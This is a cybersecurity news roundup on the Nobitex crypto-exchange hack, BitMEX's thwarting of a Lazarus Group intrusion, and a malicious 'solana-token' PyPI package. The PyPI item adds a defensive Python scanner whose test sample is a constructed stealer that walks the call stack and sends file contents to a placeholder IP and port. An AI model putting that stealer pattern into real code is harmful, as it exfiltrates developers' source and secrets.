CyberSecurity news

FlagThis - #cryptocurrency

Nicholas Kitonyi@NFTgators //
A pro-Israel hacking group, known as Predatory Sparrow, has claimed responsibility for a cyberattack against Nobitex, Iran’s largest cryptocurrency exchange. The attack resulted in the theft of approximately $90 million in various cryptocurrencies, including Bitcoin and Dogecoin, as well as over 100 other cryptocurrencies. According to blockchain analytics firm Elliptic, the funds were drained from the exchange’s wallets into blockchain addresses containing anti-government messages explicitly referencing Iran's Islamic Revolutionary Guard Corps (IRGC).

The attackers, instead of attempting to profit financially, intentionally destroyed the stolen cryptocurrency in what has been described as a symbolic political statement. The funds were sent to blockchain addresses with the phrase "F***iRGCTerrorists" embedded within them. Experts say that generating addresses with such specific terms requires significant computing power, suggesting the primary goal was to send a message rather than to gain financially. The incident underscores the rising geopolitical tensions between Israel and Iran and the vulnerability of cryptocurrency exchanges to politically motivated cyberattacks.

The cyberattack on Nobitex is part of a broader pattern of cyber warfare between Israel and Iran. While the physical conflict has seen airstrikes and other military actions, the digital realm has become another battleground, with potentially significant repercussions for both countries and the wider global community. This incident also follows reports of internet restrictions within Iran, limiting citizens' access to information and communication amid escalating tensions. The global cybersecurity community needs to stay prepared: the cyberwarfare side of the conflict is already spilling beyond the battlefield and the region, with repercussions for both combatants and for everyone else.



References :
  • Zack Whittaker: This article also discusses the attack against Nobitex, noting the financial losses and the involvement of a pro-Israel hacking group.
  • techcrunch.com: This news source provides information about the attack against Nobitex, mentioning the theft and destruction of cryptocurrency.
  • Metacurity: This article reports on the attack against Nobitex by the Predatory Sparrow group, highlighting the financial impact and geopolitical context of the event.
  • NFTgators: This news piece details the financial impact of the attack on Nobitex and the potential geopolitical implications.
  • WIRED: This article covers the same event with additional details about the actions of the attacker group and their motives.
  • aboutdfir.com: Pro-Israel hackers drained $90 million from Iran crypto exchange, analytics firm says
  • fortune.com: Pro-Israel group hacks Iranian crypto exchange for $90 million—but throws away the money
  • SecureWorld News: As kinetic conflict continues to unfold between Israel and Iran, a parallel battle is raging in cyberspace—one that is disrupting financial systems, wiping out crypto holdings, hijacking broadcast channels, and even triggering a near-total internet shutdown.
  • Web3 is Going Just Great: Israeli-linked hackers steal and destroy $90 million from Iranian Nobitex exchange. The Iran-based Nobitex cryptocurrency exchange suffered a $90 million hack, and the attacker has also promised to imminently release data and source code from the platform.
  • www.elliptic.co: The Iran-based Nobitex cryptocurrency exchange suffered a $90 million hack, and the attacker has also promised to imminently release data and source code from the platform.
Classification:
  • HashTags: #CyberWarfare #Crypto #IranIsrael
  • Company: Iran Crypto Exchange
  • Target: Iran Crypto Exchange
  • Attacker: Predatory Sparrow
  • Product: Crypto Exchange
  • Type: Hack
  • Severity: Disaster
Editor-In-Chief, BitDegree@bitdegree.org //
The BitMEX cryptocurrency exchange has successfully thwarted an intrusion attempt orchestrated by the Lazarus Group, a notorious hacking organization with ties to North Korea. The exchange's security team detected the attack, preventing any compromise of their systems. In a significant countermove, BitMEX's security team managed to access one of the Lazarus Group's servers, providing valuable insights into their operations and tactics.

Researchers at BitMEX uncovered critical missteps made by the Lazarus Group during their campaigns, including exposed IP addresses and an accessible database. One key finding involved a rare slip-up where a hacker inadvertently revealed their real IP address, which was traced to Jiaxing, China. This location is near Shanghai and represents a notable lapse in security for the typically secretive group. BitMEX also blocked a phishing attempt linked to the Lazarus Group, where attackers posed as NFT partners on LinkedIn to trick one of its employees.

The Lazarus Group's attack strategy often begins with relatively unsophisticated methods like phishing to gain initial access to targeted systems. In this case, the attackers invited a BitMEX employee to a private GitHub repository containing code for a fake Next.js/React website. The goal was to make the victim run the project, which included malicious code, on their computer. BitMEX emphasized that the "Lazarus Group" comprises multiple hacking teams under the control of the North Korean government, responsible for stealing significant sums of money through various cyberattacks.



References :
  • blog.bitmex.com: The BitMEX cryptocurrency exchange says it detected and stopped an intrusion attempt from North Korean hacking group Lazarus. BitMEX's security team gained access to one of the group's servers and traced one of its operators to Jiaxing, China.
  • bsky.app: The BitMEX cryptocurrency exchange says it detected and stopped an intrusion attempt from North Korean hacking group Lazarus.
  • DataBreaches.Net: Researchers at crypto exchange BitMEX on Friday said that they had uncovered several critical missteps that North Korean state-sponsored hacker group Lazarus had made during its campaigns. Those lapses included exposed IP addresses, an accessible Supabase database, and tracking algorithms.
  • Catalin Cimpanu: BitMEX cryptocurrency exchange says it detected and stopped an intrusion attempt from North Korean hacking group Lazarus. BitMEX's security team gained access to one of the group's servers and traced one of its operators to Jiaxing, China.
  • www.bitdegree.org: BitMEX has blocked a phishing attempt linked to the Lazarus Group , a hacking operation with ties to North Korea.
  • Metacurity: German police ID Trickbot's "Stern," BitMEX thwarts Lazarus Group attack, Shin Bet thwarted 85 Iranian cyberattacks aimed at civilians, Vibe coding app Lovable failed to fix critical flaw, China's quantum satellite Micius has a security flaw, Russia's Unit 29155 has a hacker team, much more
  • bsky.app: The BitMEX cryptocurrency exchange thwarted an intrusion attempt from the North Korean hacking group Lazarus Group.
  • securityonline.info: BitMEX Turns Tables on Lazarus Group: Infiltrates Hacker Infrastructure
  • Metacurity: Bitcoin options trading venue BitMEX discovered an operational security mistake in a thwarted attack by N. Korea's Lazarus Group, which revealed the attackers' IP address and uncovered at least 10 potential accounts used to test or develop its malware.
lucija.valentic@reversinglabs.com (Lucija)@Blog (Main) //
A malicious Python package named `solana-token` has been discovered on the Python Package Index (PyPI) targeting Solana developers. This rogue package, posing as a utility for the Solana blockchain, was designed to exfiltrate source code and developer secrets from compromised machines to a hard-coded IP address. The ReversingLabs research team uncovered this supply chain attack, highlighting the increasing trend of malicious actors targeting cryptocurrency projects. Before being taken down, the `solana-token` package was downloaded over 600 times, potentially distributed through developer-focused platforms.

The malicious package showed telltale signs of compromise: hard-coded IP addresses, outbound connections to non-standard network ports, and code that reads local files, all typical of information stealers. One particularly insidious technique walked the Python execution stack, copied the source code of every file in the call chain, and exfiltrated it to a remote server. The objective was to steal sensitive information such as developer secrets and hard-coded crypto credentials, which could give attackers unauthorized access to cryptocurrency wallets and critical infrastructure.

This incident is not isolated: a previous package with the same name was published and removed in 2024, which suggests the same malicious actors may be behind the new version, the report said. Cybersecurity experts recommend that organizations counter the growing number of supply chain threats against cryptocurrency projects by aggressively monitoring for suspicious activity and unexplained changes in open source and commercial third-party software modules. Stopping malicious code before it reaches secure development environments is what prevents destructive supply chain attacks.
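One way a package-vetting step could flag the indicator classes named above (hard-coded IPs, non-standard ports, local file reads, execution-stack inspection) with a static AST pass. This is an added example, not ReversingLabs' tooling; the sample module is constructed and the choice of 80/443 as the only "standard" ports is an assumption.

```python
"""Static triage of one Python source file for the indicator classes described
for solana-token. Added example; not ReversingLabs' tooling. SAMPLE is constructed."""
import ast
import re

IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
STANDARD_PORTS = {80, 443}          # assumption: anything else is "non-standard"
STACK_CALLS = {"inspect.stack", "inspect.currentframe", "sys._getframe"}

def _dotted(node):
    """Render a call target such as inspect.stack as a dotted string (or None)."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None

def scan_source(src):
    """Return (indicator, line) findings, ordered by line then indicator name."""
    findings = set()
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and IPV4_RE.match(node.value):
            findings.add(("hardcoded_ip", node.lineno))
        elif isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in STACK_CALLS:
                findings.add(("stack_inspection", node.lineno))
            elif name == "open":
                findings.add(("file_read", node.lineno))
            elif name and name.endswith(".connect"):
                # sock.connect((host, port)): flag ports outside HTTP/HTTPS
                for arg in node.args:
                    if isinstance(arg, ast.Tuple) and len(arg.elts) == 2:
                        port = arg.elts[1]
                        if isinstance(port, ast.Constant) and port.value not in STANDARD_PORTS:
                            findings.add(("nonstandard_port", node.lineno))
    return sorted(findings, key=lambda f: (f[1], f[0]))

# Constructed stand-in for the stealer pattern: walk the stack, read each caller's file, send it out.
SAMPLE = '''import inspect, socket
def register():
    s = socket.socket()
    s.connect(("203.0.113.7", 8765))
    for frame in inspect.stack():
        s.sendall(open(frame.filename, "rb").read())
'''

def scan_sample():
    return scan_source(SAMPLE)

if __name__ == "__main__":
    for indicator, line in scan_sample():
        print(f"line {line}: {indicator}")
```

A real vetting pipeline would run this over every file in the unpacked wheel or sdist and treat several co-occurring indicators in an install-time or import-time path as a reason to quarantine the package before any developer runs it.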



References :
  • securityonline.info: PyPI Malware Alert: Malicious ‘solana-token’ Package Targets Solana Developers
  • Blog (Main): Same name, different hack: PyPI package targets Solana developers
  • The Hacker News: Malicious PyPI Package Posing as Solana Tool Stole Source Code